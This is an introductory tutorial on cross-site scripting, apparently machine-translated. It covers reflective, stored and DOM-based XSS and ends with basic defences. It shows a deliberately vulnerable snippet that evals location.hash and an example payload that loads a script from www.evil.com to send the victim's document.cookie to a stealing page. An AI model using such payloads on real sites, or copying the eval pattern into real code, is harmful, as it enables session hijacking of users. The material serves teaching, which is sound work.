Cross-site scripting attacks (XSS)

• Cross-site scripting attacks (XSS)

XSS occurs at the browser level of the target user in the target site, and unexpected script execution occurs during the user's browser rendering the entire HTML document.

The focus of cross-site scripting is not on "cross-site", but on "scripting"

Simple example:

There's a piece of JavaScript on the xss1.html page.

<script>    eval (location.hash.substr (1)); </script>

When you visit the xss1.html page in your browser, add #alert (' 1 ') after the URL, such as file:///C:/Users/Jie/Desktop/3.html#alert (1)

Then the browser will pop up this 1.

Of course hackers do not play windows, he will use this vulnerability to obtain your cookie and other useful information, such as the #alert (1) replaced with #document.write ("<script src= ' www.evil.com/xss.js ' > </script> ")

The code for this xss.js is

New Image (). src= "Http://www.evil.com/steal.aspx?data=" +escape (Document.cookie);

Then get the value of data in the background of the Steal.aspx page

You may ask, who so SB write the JavaScript code on their own page, first of all know that this code is not written by the developer on the page, but later injected into the page, how to inject? This is about the type of XSS attack.

• The type of attack for XSS is mostly reflective (or non-persistent), storage (or persistent), DOM XSS

1. Reflective type

The page accepts the user's input, submits it to the server, and the server resolves the content to include the XSS code in the response, and is finally parsed by the browser. Input-"Background parsing-" front desk execution This is a reflection process.

For example: Backstage code get Xss.aspx?x=<script>alert (1) </script> URL inside the x parameter, and then directly on the page to the x parameter output, then this is a reflective type of XSS

2. Storage type

Because modern web pages are dynamically retrieved from the database and then generated HTML Web pages back to the browser, the storage-type XSS code is stored directly inside the server, when the user accesses the page with the XSS code, the attack occurs. These XSS code is generally in the acquisition of user input place, did not do effective defense, such as a forum, a hacker in the message board entered a paragraph containing XSS attack message, this message is stored in the background database, the next time a user to view the message board. The XSS code returned from the background can attack the user's information.

3. DOM XSS

Dom XSS and Reflective XSS, storage-type XSS is the difference between Dom XSS does not need to go through the server-side parsing, triggering XSS depends on the browser DOM parsing

For example, the first example mentioned at the beginning of this article is Dom XSS

• Defensive means

The main defense of XSS is: Do not trust the user's input, verify the user's input, the user's input and output are HTML-encoded.

Cross-site scripting attacks (XSS)